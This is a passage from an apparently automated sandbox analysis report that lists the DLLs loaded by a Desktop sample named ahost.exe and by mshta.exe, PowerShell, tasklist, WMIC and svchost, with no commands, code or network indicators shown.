Source: C:\Users\user\Desktop\ahost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
